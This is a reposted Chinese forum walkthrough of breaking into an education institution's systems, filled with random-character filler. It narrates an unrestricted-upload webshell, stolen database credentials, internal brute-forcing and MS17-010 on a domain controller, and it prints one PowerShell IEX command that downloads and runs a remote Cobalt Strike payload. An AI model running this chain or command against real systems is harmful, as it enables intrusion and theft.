中国网络渗透测试联盟

标题: 渗透实战 | 从外网直接打到内网全过程 [打印本页]
作者: admin    时间: 2024-3-1 19:41
标题: 渗透实战 | 从外网直接打到内网全过程

! T/ j6 F6 k1 L( e 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路 9 c( i" g( i2 v5 P' l

- P( |5 H9 I5 E! z( @% J

* m4 K# ]# _* y! \2 `  ; u9 \. s/ E( G" A% J' X5 y

5 P g* V7 M; N: h$ @

. i. X8 f) c/ \/ t" ^ 正文 2 b4 i8 r. E# X+ e C

/ E0 f g! Z3 f! R X

& r ~' ]: l/ O$ k0 V   F4 A* Q$ S* w0 s4 Z9 c5 L/ U3 h

' n3 i7 u- g( o: u0 P, c

' l, f4 |; n( d' n! _ 目标:www.xxxx.com(一家教育机构)
4 s$ K0 q1 }# g, }. D打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能8 a/ j2 T- `5 }' Q

/ ^ j2 m7 ?" i. w6 Z. Y

% H& V0 J' s0 Y! [, X$ T* S: ` vshapes= 1 D7 I/ o0 A) X: g; X3 }

( ~4 m( ~! P) I5 A+ L6 t

* y+ S3 b4 {, ]/ d5 }* T! x 进行了简单的信息搜集
/ b* w9 {& ]6 t7 m/ `
6 s9 W6 ?& n/ z7 O$ q( c, {6 b' `$ x \- C* m8 b1 `" k9 r3 X0 g" q( t3 L

+ N7 M2 y$ L) r6 ]6 b. l! j

5 {1 u& `- O/ U 子域名搜集 ! [5 v1 C* J" | ?# ^/ X0 f. n6 u2 U3 Q

! ~8 Q! x v9 _( u* L

1 O. A4 q& l& t+ b- `+ ] vshapes= & s0 s8 J- b+ P. _. M; s: b( \. A

" N. l( Q) Y- r* w

* M8 u f% v! `; F8 Z& c5 t3 M. d6 M fofa找资产
: C3 g7 @6 w9 M& t4 _
" a; s& H& J4 x$ ^8 M3 o1 x 5 j6 O; X( ^+ t* [( y. O. W; i7 ~

/ H! g$ d) ?% ?: k

% b, ?8 Q# y8 z7 G vshapes= $ W+ Y! b4 B1 |' a

/ @- d( g# b& h1 H$ \$ n

% E6 j$ Z- r: M7 a* Q: C3 j" _+ H 一共七个资产。去重之后只有两个。
1 G9 ?7 J& {# U, _6 T
6 h& X7 |, \5 W% m& j , X2 ~9 t( T0 W

* q( w$ d# b1 c: f" S

# C+ i: |7 V, s1 ? 目录探测4 v! a: O5 H- L; |3 _3 [

- M' N% p; v* {# U

. X) P- \( n1 f$ F' g+ U" g vshapes= 9 a: \$ ~; Y$ b. C8 N, C0 l

) J1 u9 K1 A. z: V# f8 z, f* o8 W

0 B$ E; Z6 b# p- @% d 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
7 O# X0 r% V3 l7 q V4 f8 w4 H/ |
1 i% \6 w5 t8 z } % g3 E! p# `( k; w9 P7 g

! y. v( p$ \ q0 k& [+ I1 `- q3 q

. {$ U- y! [1 L* ?* b 我又尝试了通过修改返回包来绕过登录界面 2 d! L* q+ H& Q A, `* L

. |6 K! ]% s* E. u' X& r

; N6 X6 o T8 ?8 I vshapes= 8 d' \0 {7 M4 W6 O/ W+ o

! u" ~. a0 V8 ~4 b

3 ]% }+ E/ N+ } ]5 [4 V 还是不行,尝试注入无果4 ^8 | H9 p7 W; z: U K

6 l. s& q, Z6 F7 B

1 T* m. e) h5 b. f" d9 L) F vshapes=8 L* B' ~# D3 O

1 D7 J4 X, {! B: N; m

; `% r0 _6 {' S, k, B3 y 不过我目录探测出了一处Spring信息泄露
- q- |/ A- J: r2 ?) |
0 s+ p& \% ]$ X0 X0 S R; o+ r+ G 4 U0 B) O% p8 w+ ~ n- ?

5 M& i2 f0 C! R1 N

+ |: L4 H1 u n' C( v vshapes= F) | p, ?9 H& A8 }

' Q7 y! J8 u v8 I4 C# F

0 A6 {, P3 R( {. O$ x& A 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录 1 K( o' _2 K1 x

0 P/ ?8 W- P4 c% G

7 d4 ~% J+ J0 s6 `5 ^ vshapes=8 a3 _# h" B; M% [# t8 T, G" V6 K

' T' j* X* u( x2 S" |

8 {1 j9 V3 u. v# @9 I6 g 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。 : i9 W- ?9 ^8 L2 Z: N, v

! J' a' g" W' R

+ c( M5 L/ G1 Q6 u8 |) W vshapes=8 @& k! |2 X+ [0 D' ~4 r9 b# D

' E( X: ^1 _# ^6 `4 `8 i0 `

3 O7 l4 C3 ]& C/ s2 l, D7 p 获取有些师傅到这一步就手机抓包电脑测了。( R; P) E6 D% L1 }! P

6 @: _/ U, ^+ V9 N7 [1 Z d

" U; [5 P: Z, z7 O Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。 , _' N7 z7 g$ H& D$ P% u

. Z' p: I6 j! {& z/ F2 L. X5 ]2 ^

6 x- r' d) ]$ l+ G8 W u 其中在一个公众号发现了小程序,可以进行注册。0 m/ B: i. h3 u8 `- i1 @$ k

9 t7 k) Z9 d; E$ s- ^/ z

8 n9 ~: k6 l/ ^) O; K 看到了头像上传,尝试上传获取WebShell " W- H2 ~. U! L3 x5 S! k: M. z

" A8 r1 H8 k0 O5 {

7 p' a, Q+ j9 ]: G vshapes=1 i( ~5 q3 [& X6 v. D

: `4 P0 ^! V3 d$ y1 J4 p3 t

, ? h1 k8 Y7 |" V/ x" G4 k 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问8 a0 q3 O9 A$ `( Y

- Q- b8 j7 ? b

. r. [6 z, q2 Y: D5 C! O2 w: j8 {2 F vshapes= 3 R' K* n' `+ D& ^

$ d# H8 D- ?9 v! W/ |$ N2 I2 |

' e) f& t Z6 p* C6 K) L' A1 c 然后上了大马 u- a+ ~* b6 `

( U3 G, S8 J" T6 Q. E. P0 D

. @' z- U% Z$ v+ K% z* E vshapes=! V/ r4 }( U- i/ c

; i6 m3 G" V/ p% W

, M1 T" h2 V6 r; ^3 p4 V6 ^$ J' u vshapes=) a1 X( \4 a* f$ X; C. o% ?: m$ l( a

4 B r0 R4 a' m$ y

; X& F# Q. o, u4 m 通过翻找文件发现数据库账号密码 3 C1 B: Z4 a M5 w6 ?

) u1 b! a* s# G) E

0 B+ w! Q# m% u& \7 e2 f6 s- c' i vshapes= & k7 k7 o* L) ^

. _0 k& ` c/ s, G4 d1 r* U/ R

! v7 {& Y% q2 g3 I: a --内网渗透( n/ l# C5 I4 T8 {

6 s9 i/ q5 p. f! g& u l( g

/ ^9 o- L7 m' i& d2 ~3 g( r H; C 直接通过powershell执行 cs上线 & S/ d+ k7 s: h( o

; R) t7 {4 X& Y$ p/ J$ L! K' |

7 F7 {0 [8 |$ L2 N$ g9 X0 _ powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"5 V4 x/ n8 d% Z* H8 Y

4 c3 ]& |1 }2 _+ E# \5 H; R! U

/ z* T9 k9 d, d- }$ q4 z" o: _ vshapes=& a7 s) c. T6 _7 [

, F" ]$ x5 t$ H) `

% L2 [) X, Z9 w, d& H 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 : s d- [2 F+ v" N- t: B

9 ?- j6 l! J, Y2 o6 s

! C( T% _+ A F- H8 t0 ~7 G) p vshapes=' z& N8 B7 G) |. s# R

9 y3 c* q, \/ c1 m

3 e# V. |" |( x5 `# u' ~ 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
2 E+ C, x$ c+ M4 G b) I5 z+ ]
9 J- j a* P4 e3 l7 j6 k9 |
1 N, @% m3 Y. j: ?' H3 {6 s . u# g' x0 B& O0 a2 V

- x/ |3 o+ |! _6 |$ L+ H- e

8 ~: Y4 i; a& ~. T6 m vshapes=, R+ p, V8 k1 [) f" g3 t# s n

7 v) L( a" [4 @8 _$ k

1 R( o6 \5 \ o5 K4 d 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
4 i8 j7 L$ F$ w- e" P
/ b: \# B" R% h$ {& u$ Y! ^1 U1 z. Y, G: i! q |5 o

( B- [+ f2 v0 E6 a

3 J3 u: ]3 x2 l. n vshapes=* X1 ?! s K6 X2 i6 Q* O

% s7 D2 w a0 K7 Q5 J- n

/ S% p' z) \5 P" ?- y- f9 V0 \
* ~' o* q8 h0 |$ ]$ @, g
' b1 `7 e: t6 c; k7 g ; o- \0 c9 d; u/ R% D5 V

9 ~. q5 _# K g8 t! a; D N/ M0 d

$ }& F' U) u/ {2 X  . i. `( X) w# z3 i: ?) ]1 I; u+ ^

. K5 ]$ b. W4 `6 q. J% N

( }$ X; Y3 _- e0 T6 e. H. j 小结 / k2 Y$ G' q3 V+ ?- M

/ C E' Q. x1 x; S, }. O% e' c

6 @/ \; b2 @9 p/ U* \( Q0 R$ k   & Y5 z- k, p' E% {6 B3 `+ ?2 J7 T8 S) l& C

* m8 T( `( q- q6 y& J4 f

8 C+ g9 D4 m" r% F6 J 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路! % i# T, m4 f. A0 n5 w7 A' D

5 Z+ E# m; I ^ D) H0 Z

+ @5 _6 ?' O6 N& V) v, P3 g   9 X; H% |! ~1 w0 r! R- J

: [9 f. Y: ^0 W3 t & }5 [2 b# i# \: J0 J' j

# L! B$ }! j. I }& S4 c: t% j 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html " Y9 `4 P- _0 t* H) A2 W

/ G( U4 h2 h8 o4 s

6 J4 Z& m, w% Z   0 w6 s- m/ V S/ b1 o





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2